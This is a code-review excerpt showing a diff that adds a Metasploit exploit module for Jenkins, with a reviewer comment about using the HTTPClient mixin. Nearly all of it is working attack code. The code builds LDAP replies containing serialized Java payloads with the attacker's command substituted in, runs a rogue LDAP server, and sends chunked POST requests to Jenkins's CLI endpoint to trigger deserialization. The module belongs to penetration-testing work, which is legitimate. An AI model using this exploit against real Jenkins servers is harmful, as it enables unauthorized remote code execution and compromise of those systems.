modules/exploits/linux/misc/jenkins_ldap_deserialize.rb

```diff
@@ -0,0 +1,250 @@
+    OpenSSL::ASN1::Integer.new(x)
+  end
+
+  def string(x)
+    OpenSSL::ASN1::OctetString.new(x)
+  end
+
+  def set(x)
+    OpenSSL::ASN1::Set.new(x)
+  end
+
+  def java_string(s)
+    length = s.length
+
+    packed_length = [length].pack("S>")
+
+    "#{packed_length}#{s}"
+  end
+
+  def make_stage2(command)
+    [STAGE2].pack("H*").gsub("\x00\x0Etouch /tmp/wtf", java_string(command))
+  end
+
+
+  def make_stage2_reply(command)
+    message_id = 3
+    java_class_name_attributes = seq([string("javaClassName"), set([string("WTF")])])
+    java_serialized_data_attributes = seq([string("javaSerializedData"), set([string(make_stage2(command))])])
+    attributes = seq([java_class_name_attributes, java_serialized_data_attributes])
+    s = seq([
+      int(message_id),
+      aseq([string("cn=wtf, dc=example, dc=com"), attributes], SEARCH_RES_ENTRY)])
+    s.to_der
+  end
+
+
+
+  def make_stage1(ldap_url)
+    [STAGE1].pack("H*").gsub("\x00\x15ldap://localhost:1234", java_string(ldap_url))
+  end
+
+
+  def read_ldap_packet(socket)
+
+    bytes = socket.read(2)
+    if bytes[0] != "0"
+      raise "NOT_LDAP: #{bytes.inspect} #{bytes[0]}"
+    end
+
+    length = bytes[1].ord
+    if (length & (1<<7)) != 0
+      length_bytes_length = length ^ (1<<7)
+
+      length_bytes = socket.read(length_bytes_length)
+      length = length_bytes.bytes.reduce(0) {|c, e| (c << 8) + e}
+    end
+
+    socket.read(length)
+  end
+
+
+  def write_chunk(socket, chunk)
+    socket.write(chunk.bytesize.to_s(16) + "\r\n")
+    socket.write(chunk)
+    socket.write("\r\n")
+  end
+
+  def exploit
+    uuid = SecureRandom.uuid
+
+    ldap_port = datastore["SRVPORT"]
+    ldap_host = datastore["SRVHOST"]
+    ldap_external_host = datastore["LDAPHOST"]
+
+    command = payload.encoded
+    host = datastore["RHOST"]
+
+    ldap = TCPServer.new(ldap_host, ldap_port)
+
+    cli_path = normalize_uri(target_uri.path, "cli")
+
+    begin
+
+      download = connect()
+
+      begin
+
+        download.write("POST #{cli_path} HTTP/1.1\r\n" +
+          "Host: #{host}\r\n" +
+          "User-Agent: curl/7.36.0\r\n" +
+          "Accept: */*\r\n" +
+          "Session: #{uuid}\r\n" +
+          "Side: download\r\n" +
+          "Content-Length: 0\r\n" +
+          "Content-Type: application/x-www-form-urlencoded\r\n\r\n")
+
+        download.read(20)
+
+        upload = connect()
+        begin
+          upload.write("POST #{cli_path} HTTP/1.1\r\n" +
+            "Host: #{host}\r\n" +
+            "User-Agent: curl/7.36.0\r\n" +
+            "Accept: */*\r\n" +
+            "Session: #{uuid}\r\n" +
+            "Side: upload\r\n" +
+            "Content-type: application/octet-stream\r\n" +
+            "Transfer-Encoding: chunked\r\n\r\n")
+
+          write_chunk(upload, "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=")
+          write_chunk(upload, "\00\00\00\00")
+
+          upload.flush
```

Comment:
This also looks like a standard POST request which can be handled by the HTTPClient mixin. https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient